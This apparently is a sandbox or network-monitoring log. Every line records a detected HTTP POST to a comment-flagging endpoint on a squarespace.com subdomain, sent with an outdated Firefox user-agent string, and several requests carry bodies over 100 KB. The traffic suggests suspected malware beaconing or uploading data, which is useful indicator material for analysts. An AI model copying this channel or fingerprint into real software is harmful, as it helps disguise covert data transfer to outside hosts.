Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 578Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 314Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 578Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 850Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108352Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 116734Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108700Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108904Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 324Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108352Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 322Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108350Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/FlagComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
